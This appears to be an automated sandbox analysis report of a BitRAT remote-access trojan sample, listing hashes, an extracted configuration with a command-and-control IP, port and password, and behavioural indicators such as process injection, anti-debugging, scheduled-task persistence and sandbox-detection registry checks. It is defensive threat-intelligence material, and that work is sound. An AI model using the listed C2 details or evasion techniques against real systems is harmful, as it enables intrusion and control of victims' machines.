Analysis
-
max time kernel
155s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
29-01-2024 21:04
Static task
static1
Behavioral task
behavioral1
Sample
80dcd56f6d8e3324d715736b66858795.exe
Resource
win7-20231215-en
General
-
Target
80dcd56f6d8e3324d715736b66858795.exe
-
Size
7.9MB
-
MD5
80dcd56f6d8e3324d715736b66858795
-
SHA1
5b94991f56910b4bac99bef952ce88c740883b4d
-
SHA256
2a5860280179b24de91f70165fb736afa5947cefb5c33c63202c7d8c5d00d1d0
-
SHA512
d9e0d10a5c11ec3e3ccb62e448f9be9c6287ae118cc7c84f2012999b35836688946dd3a05b046daf370870fadcec2f690850f25f5811400572639de0554e135b
-
SSDEEP
196608:LK8mrs8c1/ohqLBhTZEIN+8y2CVoW1a+QKON:tmrsChqNby2CB1a+
Malware Config
Extracted
bitrat
1.38
178.20.40.235:5555
-
communication_password
cc86a50fb8f3c4840cb346a0829f64a2
-
tor_process
tor
Signatures
-
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 2572 created 4080 2572 WerFault.exe DllHost.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 3 IoCs
Processes:
powershell.EXEpowershell.EXEsvchost.exedescription pid process target process PID 4284 created 584 4284 powershell.EXE winlogon.exe PID 1592 created 584 1592 powershell.EXE winlogon.exe PID 4948 created 4080 4948 svchost.exe DllHost.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
80dcd56f6d8e3324d715736b66858795.exe$77.WWI Provider Host.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation 80dcd56f6d8e3324d715736b66858795.exe Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation $77.WWI Provider Host.exe -
Executes dropped EXE 3 IoCs
Processes:
$77.sedsvc.exe$77.WWI Provider Host.exe$77.Install.exepid process 848 $77.sedsvc.exe 912 $77.WWI Provider Host.exe 1056 $77.Install.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\$77.sedsvc.exe upx behavioral2/memory/848-37-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/848-175-0x0000000000400000-0x00000000007E4000-memory.dmp upx behavioral2/memory/848-214-0x0000000000400000-0x00000000007E4000-memory.dmp upx -
Drops file in System32 directory 25 IoCs
Processes:
svchost.exeOfficeClickToRun.exepowershell.EXEsvchost.exepowershell.EXEsvchost.exeDllHost.exedescription ioc process File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.dat DllHost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\WebCacheV01.jfm DllHost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A OfficeClickToRun.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml OfficeClickToRun.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.log DllHost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\WebCache\V01.chk DllHost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 svchost.exe File opened for modification C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 svchost.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
$77.sedsvc.exepid process 848 $77.sedsvc.exe 848 $77.sedsvc.exe 848 $77.sedsvc.exe 848 $77.sedsvc.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 4284 set thread context of 1844 4284 powershell.EXE dllhost.exe PID 1592 set thread context of 1868 1592 powershell.EXE dllhost.exe -
Drops file in Windows directory 4 IoCs
Processes:
$77.Install.exedescription ioc process File created C:\Windows\Tasks\$77svc32.job $77.Install.exe File opened for modification C:\Windows\Tasks\$77svc32.job $77.Install.exe File created C:\Windows\Tasks\$77svc64.job $77.Install.exe File opened for modification C:\Windows\Tasks\$77svc64.job $77.Install.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exewmiprvse.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\ConfigFlags svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{4340a6c5-93fa-4706-972c-7b648008a5a7}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0058 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0038 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\300A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Mfg wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Mfg svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\0016 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc wmiprvse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0005 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0008 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0008 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Service wmiprvse.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName svchost.exe -
Checks processor information in registry 2 TTPs 9 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
mousocoreworker.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz mousocoreworker.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier mousocoreworker.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
mousocoreworker.exeWerFault.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS mousocoreworker.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU mousocoreworker.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
OfficeClickToRun.exepowershell.EXEpowershell.EXEmousocoreworker.exesvchost.exesvchost.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1706562365" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\DeviceTicket = 0100000001000000d08c9ddf0115d1118c7a00c04fc297eb01000000a8408a7191d78d49839702b8b864023600000000020000000000106600000001000020000000a4af29a6cb64bcfea6051277d2e871623fedd651c056dff6d5fd14a59e48801c000000000e80000000020000200000000383c38221bd3602c2944b4bff5556befdf99d07de3f09f3c1a392af08e0932fb00300001cab0c631da40ed959fa90430a2e8698a7c37156213f83ae1d5bd28dd6edad2aae406c0e9384bc1ab5ab7d5c093bb2e22cfa4cb3d89b1dbdbe1db39ff1990fe56cfcf1fdb92c063b24c844e6dffbe3fa11efb9cbbc095559a6e92583a0d691d9ac35be17be7d4e73792d39f7e3369060998ab3af8077969555b203a93530285d42cc0c921f3b228efdf337dd8adf72ee1d33cc5cb2003fda5666845679127bb160a6afa3f89380360c16ad0bd01eb267fb6d3126bd3900eb4972263e82cebbba6fb49170cd36172857d2bd9088fe2875ddf9f9968a1d847368ca168709fd10a9c58a5a930c39070ce0c1be3266b99390a8cb6c17deb71dc444e9dd5e7f79ffc006a2f78556fdf22cc80257b67ff34de9c444c8126aff140eb30b39cbd65c75f8a57d2982f7e256f8167bcd86528c1fdf371a782e2ebcfc2a67117aa47c1b10b9a6c141140e82e1a5ef914fc83a008d679b18907774567ee9a57ff1342d5643d097688ebbbc812ac3d6d0fe45ef980388fdc8b21803beb8cb0bfbd96c4f04d211f407095b01177c5cd0b17f1c6a2e5e7530b7381031d61b26401796d46c56db377573132307ba51aadb881e2a247a9026c148d27076c7f459ea0dd1c2bd4fe77e0bb4d8cd2686823efe2c65a4271e88f4545f355e5185a5214b9db68af73c74e133745a43de783d0d87783f9e7e6da0df1d719f27ba4f223136d52f483492bb20efe03c0b1e4d31492e6ddbc72cb9ceb6e2f6acda317d273ca03f27d4418c740204a47cb1e46a961439343097a4a8b587e6301634c2622de48de51e1f20d9c36526783ce1aa82f1209d070038eb0d30206f216c7de6f8f9bfd16a82e8886153f54d50e7fd7ea15e1bc552c8f9c7bcf09254cdedb7cc3ce4202a8ff2895207bb0670e06b583dd8a6d78de69853e3031328323bf2886e84ad70a32f4124e465d3775c9c85b86700af5a1fb88c916c206a937f443a77864e53d2ec91a80fe9910fea8fe41ee7c7708a03ad01280856d74b0a6e0587f43b6d187aae49775bba6bccf68b3ce1e914d58674e085a9755aa0de279440d032272558d62fc7fdd184f33e41d7ba6a4dbd55438e78f33901c3811e464f214a4fe1791df9e906475e89033fae5dc4f5af54382477f643d87a786882c4e1135248a49732496302468e42a105f02d3d14941ad5b260d2cffecb1a08596425efe9ff4fc4bbde00f39de2d7fa7b472b9732280ef68ea81d0e74174955d296a3f3222e9c131b525132c7c35341a5ef194644fc67c420626e43eb10bfdece9bf1674e9e6f26c9ced8a36b6f6d0177c6ab786b6f6f57e9e4b968845143ce5245400000002b299fe541ddacd336df72a57bbc0a14dc97ca193450f49eed371687a146913e9e5164647b93b56a292d67a05a0f9afa63cbeea00b12c1167bb935964ea3f7e2 mousocoreworker.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe = "Mon, 29 Jan 2024 21:06:07 GMT" OfficeClickToRun.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\Immersive\production\Token\{0CB4A94A-6E8C-477B-88C8-A3799FC97414}\ApplicationFlags = "1" mousocoreworker.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created 